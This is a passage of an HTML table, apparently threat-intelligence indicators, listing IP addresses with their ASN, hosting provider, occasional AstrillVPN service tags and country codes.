hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Indicator</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">ASN</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">NetBlock</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Service</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Location</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">103.244.174.154</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">9541</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cybernet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(PK)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.129.55.3</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8100</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">QuadraNet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.206.40.138</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">62904</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Eonix Corporation</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.223.97.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8100</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">QuadraNet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.223.98.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8100</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">QuadraNet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.243.33.74</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">23470</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ReliableSite.Net LLC</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.250.148.58</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">53850</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GorillaServers</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">109.82.113.75</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">35819</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mobily</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(SA)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">113.227.237.46</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4837</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">China Unicom</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(CN)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">119.155.190.202</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">56167</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Ufone</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(PK)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">123.190.56.214</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4837</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">China Unicom</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(CN)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">155.94.255.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8100</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">QuadraNet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">174.128.251.99</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46844</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Sharktech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">18.144.99.240</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16509</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Amazon.com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">184.12.141.109</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">5650</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Frontier Communications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">192.119.10.67</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">55081</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">24 Shells</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">192.119.11.250</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">55081</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">24 Shells</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">192.74.247.161</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">54600</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Peg Tech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">198.135.49.154</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">396073</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Majestic Hosting Solutions, LLC</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">198.2.228.20</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">54600</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Peg Tech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">198.23.148.18</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">36352</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ColoCrossing</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">199.115.99.34</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46844</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Sharktech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">204.188.232.195</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46844</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Sharktech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">207.126.89.11</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">6939</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hurricane Electric</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">208.68.173.244</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">29838</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Atlantic Metro Communications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">23.105.155.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">396362</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Leaseweb New York</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">23.237.32.34</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">174</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Fdcservers</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">3.15.4.158</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16509</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Amazon.com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">37.19.199.133</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">212238</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Datacamp Limited</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">37.19.221.228</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">212238</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Datacamp Limited</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">37.43.225.43</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">35819</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mobily</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(SA)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">38.140.49.92</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">174</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cogent Communications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">38.42.94.148</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">27611</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Starry</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">42.84.228.232</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4837</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">China Unicom</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(CN)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">5.244.93.199</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">35819</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mobily</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(SA)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">50.39.182.185</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">27017</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Ziply Fiber</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">51.39.228.134</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">43766</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Zain Saudi Arabia</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(SA)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">54.200.217.128</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16509</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Amazon.com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">60.20.1.234</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4837</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">China Unicom</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(CN)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">66.115.157.242</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46562</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Performive</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">67.129.13.170</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">209</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CenturyLink</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">67.82.9.140</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">6128</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Optimum Online</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">68.197.75.194</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">6128</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Optimum Online</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">70.39.103.3</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46844</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Sharktech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">71.112.196.114</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">701</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Verizon Fios Business</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">71.112.196.115</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">701</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Verizon Fios Business</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">72.193.13.228</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">22773</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cox Communications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">74.222.20.18</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">74.222.20.18</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Perfect International</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: 